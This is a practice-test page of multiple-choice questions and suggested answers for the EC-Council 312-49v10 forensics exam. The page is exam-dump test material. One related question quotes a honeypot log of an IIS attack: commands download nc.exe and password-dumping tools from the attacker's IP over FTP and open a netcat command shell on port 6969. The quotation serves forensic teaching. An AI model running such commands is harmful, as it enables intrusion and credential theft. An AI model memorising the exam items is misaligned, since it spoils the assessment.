ExamGecko
Search Search Login
Home Home / ECCouncil / 312-49v10

ECCouncil 312-49v10 Practice Test - Questions Answers, Page 63

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?
William is examining a log entry that reads 192.168.0.1 - - [18/Jan/2020:12:42:29 +0000) "GET / HTTP/1.1" 200 1861. Which of the following logs does the log entry belong to?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?
In which of these attacks will a steganalyst use a random message to generate a stego-object by using some steganography tool, to find the steganography algorithm used to hide the information?
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that that the employee was in possession of the proprietary information?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case?
Malware analysis can be conducted in various manners. An investigator gathers a suspicious executable file and uploads It to VirusTotal in order to confirm whether the file Is malicious, provide information about Its functionality, and provide Information that will allow to produce simple network signatures. What type of malware analysis was performed here?

Question 621

Report
Export
Collapse

Jack is reviewing file headers to verify the file format and hopefully find more Information of the file.

After a careful review of the data chunks through a hex editor; Jack finds the binary value Oxffd8ff.

Based on the above Information, what type of format is the file/image saved as?

A.
BMP
A.
BMP
Answers
B.
GIF
B.
GIF
Answers
C.
ASCII
C.
ASCII
Answers
D.
JPEG
D.
JPEG
Answers
Suggested answer: D

Question 622

Report
Export
Collapse

Brian has the job of analyzing malware for a software security company. Brian has setup a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has setup separated virtual networks within this environment The virtual environment does not connect to the company's intranet nor does it connect to the external Internet. With everything setup, Brian now received an executable file from client that has undergone a cyberattack.

Brian ran the executable file In the virtual environment to see what it would do. What type of analysis did Brian perform?

A.
Static malware analysis
A.
Static malware analysis
Answers
B.
Status malware analysis
B.
Status malware analysis
Answers
C.
Dynamic malware analysis
C.
Dynamic malware analysis
Answers
D.
Static OS analysis
D.
Static OS analysis
Answers
Suggested answer: C

Question 623

Report
Export
Collapse

When Investigating a system, the forensics analyst discovers that malicious scripts were Injected Into benign and trusted websites. The attacker used a web application to send malicious code. In the form of a browser side script, to a different end-user. What attack was performed here?

A.
Brute-force attack
A.
Brute-force attack
Answers
B.
Cookie poisoning attack
B.
Cookie poisoning attack
Answers
C.
Cross-site scripting attack
C.
Cross-site scripting attack
Answers
D.
SQL injection attack
D.
SQL injection attack
Answers
Suggested answer: C

Question 624

Report
Export
Collapse

A file requires 10 KB space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB on this cluster will be Identified as______.

A.
Swap space
A.
Swap space
Answers
B.
Cluster space
B.
Cluster space
Answers
C.
Slack space
C.
Slack space
Answers
D.
Sector space
D.
Sector space
Answers
Suggested answer: C

Question 625

Report
Export
Collapse

Which of the following tools will allow a forensic Investigator to acquire the memory dump of a suspect machine so that It may be Investigated on a forensic workstation to collect evidentiary data like processes and Tor browser artifacts?

A.
DB Browser SQLite
A.
DB Browser SQLite
Answers
B.
Bulk Extractor
B.
Bulk Extractor
Answers
C.
Belkasoft Live RAM Capturer and AccessData FTK imager
C.
Belkasoft Live RAM Capturer and AccessData FTK imager
Answers
D.
Hex Editor
D.
Hex Editor
Answers
Suggested answer: C

Question 626

Report
Export
Collapse

Which of the following statements pertaining to First Response is true?

A.
First Response is a part of the investigation phase
A.
First Response is a part of the investigation phase
Answers
B.
First Response is a part of the post-investigation phase
B.
First Response is a part of the post-investigation phase
Answers
C.
First Response is a part of the pre-investigation phase
C.
First Response is a part of the pre-investigation phase
Answers
D.
First Response is neither a part of pre-investigation phase nor a part of investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more efficiently
D.
First Response is neither a part of pre-investigation phase nor a part of investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more efficiently
Answers
Suggested answer: A

Question 627

Report
Export
Collapse

Consider a scenario where the perpetrator of a dark web crime has unlnstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can Investigate It for artifacts of Tor browser usage. Which of the following should the Investigators examine to establish the use of Tor browser on the suspect machine?

A.
Swap files
A.
Swap files
Answers
B.
Files in Recycle Bin
B.
Files in Recycle Bin
Answers
C.
Security logs
C.
Security logs
Answers
D.
Prefetch files
D.
Prefetch files
Answers
Suggested answer: D

Question 628

Report
Export
Collapse

A cybercriminal is attempting to remove evidence from a Windows computer. He deletes the file evldence1.doc. sending it to Windows Recycle Bin. The cybercriminal then empties the Recycle Bin.

After having been removed from the Recycle Bin. what will happen to the data?

A.
The data will remain in its original clusters until it is overwritten
A.
The data will remain in its original clusters until it is overwritten
Answers
B.
The data will be moved to new clusters in unallocated space
B.
The data will be moved to new clusters in unallocated space
Answers
C.
The data will become corrupted, making it unrecoverable
C.
The data will become corrupted, making it unrecoverable
Answers
D.
The data will be overwritten with zeroes
D.
The data will be overwritten with zeroes
Answers
Suggested answer: A

Question 629

Report
Export
Collapse

Jeff is a forensics investigator for a government agency's cyber security office. Jeff Is tasked with acquiring a memory dump of a Windows 10 computer that was involved In a DDoS attack on the government agency's web application. Jeff is onsite to collect the memory. What tool could Jeff use?

A.
Volatility
A.
Volatility
Answers
B.
Autopsy
B.
Autopsy
Answers
C.
RAM Mapper
C.
RAM Mapper
Answers
D.
Memcheck
D.
Memcheck
Answers
Suggested answer: A

Question 630

Report
Export
Collapse

Derrick, a forensic specialist, was investigating an active computer that was executing various processes. Derrick wanted to check whether this system was used In an Incident that occurred earlier. He started Inspecting and gathering the contents of RAM, cache, and DLLs to Identify Incident signatures. Identify the data acquisition method employed by Derrick in the above scenario.

A.
Dead data acquisition
A.
Dead data acquisition
Answers
B.
Static data acquisition
B.
Static data acquisition
Answers
C.
Non-volatile data acquisition
C.
Non-volatile data acquisition
Answers
D.
Live data acquisition
D.
Live data acquisition
Answers
Suggested answer: D
Total 704 questions
Go to page: of 71
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms